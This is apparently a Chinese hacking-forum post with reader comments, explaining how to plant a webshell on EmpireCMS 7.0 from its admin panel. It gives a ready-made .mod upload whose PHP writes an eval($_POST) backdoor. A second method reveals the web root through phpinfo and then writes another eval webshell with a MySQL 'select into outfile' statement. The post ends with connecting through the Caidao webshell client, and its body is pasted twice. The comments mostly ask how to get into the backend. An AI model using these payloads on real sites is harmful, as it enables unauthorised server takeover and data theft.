帝国CMS 7.0后台拿shell
小菜初到t00ls,很喜欢t00ls的技术交流氛围,此文章没啥技术含量,大牛勿喷,也勿踩,以后会为大家写更好的文章,希望大家支持~!!
谢谢~!!
这次是测试的帝国CMS7.0后台拿shell,发现后台可上传mod后缀的PHP文件并执行里面的php代码。
进入后台~!
方法一:
系统——数据表与系统模型——管理数据表
再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:
“导入系统模型”,可进入“LoadInM.php”页面,如图:
在本地新建一个文件,文本内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?> 再命名为1.php.mod,
导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件。
可以从导入系统模型源文件中查看到ecmsmod.php的路径,如图:
方法二:
在本地新建一个info.php(任意php文件)其源码内容为<?php phpinfo();?>,再重名名为info.php.mod,将此文件按照方法一导入
系统模型,即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:
info.php.mod的源码
然后
系统——备份与恢复数据——执行SQL语句
在执行SQL语句框中输入如下代码:
create table temp (cmd text not null);
insert into temp (cmd) values('<?php eval($_POST[x])?>');
select cmd from temp into outfile 'c://ecms//z.php';
drop table if exists temp;
即可在网站根目录生成z.php
菜刀连接即可~!
漏洞证明:
完毕~!
谢谢~!!
这次是测试的帝国CMS7.0后台拿shell,发现后台可上传mod后缀的PHP文件并执行里面的php代码。
进入后台~!
方法一:
系统——数据表与系统模型——管理数据表
再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:
“导入系统模型”,可进入“LoadInM.php”页面,如图:
在本地新建一个文件,文本内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?> 再命名为1.php.mod,
导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件。
可以从导入系统模型源文件中查看到ecmsmod.php的路径,如图:
方法二:
在本地新建一个info.php(任意php文件)其源码内容为<?php phpinfo();?>,再重名名为info.php.mod,将此文件按照方法一导入
系统模型,即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:
info.php.mod的源码
然后
系统——备份与恢复数据——执行SQL语句
在执行SQL语句框中输入如下代码:
create table temp (cmd text not null);
insert into temp (cmd) values('<?php eval($_POST[x])?>');
select cmd from temp into outfile 'c://ecms//z.php';
drop table if exists temp;
即可在网站根目录生成z.php
菜刀连接即可~!
漏洞证明:
完毕~!
评论41次
支持了,关键是进后台更愁人啊~~
帝国的洞,有注入价值的,到目前似乎也就那个留言板宽字节注入吧...爆密码进后台的方式真的很少,后台拿shell的话有点远了。不过楼主的研究和共享精神还是很不错滴
帝国是比较安全的了 这几年几乎没什么漏洞
我明白大家的心情,我在探索帝国CMS 如何能爆管理密码信息,帝国一直做得很严谨的~!!!
哎呦
前提是能進後臺啊
楼主是本机测试啊
恩恩 看看了!
嘿嘿,后台?本地搭建,想怎么进 怎么进 嘎嘎
帝国cms后台拿shell貌似一直在那个地方。只是方法略微有所变化。
帝国后台话说很不容易进去。。。有认证码。。不过后台拿SHELL还是来顶一个。。。
人品好的时候默认密码进去
同意楼上几位!!怎么进后台的?楼主可否分享
如何进去才是关键啊
后台浮云啊,进去是关键
顺丰快递
其实我想知道怎么进后台的
楼主加油 多找些嘿嘿
我也很想知道
我比较关心的是怎么进后台的.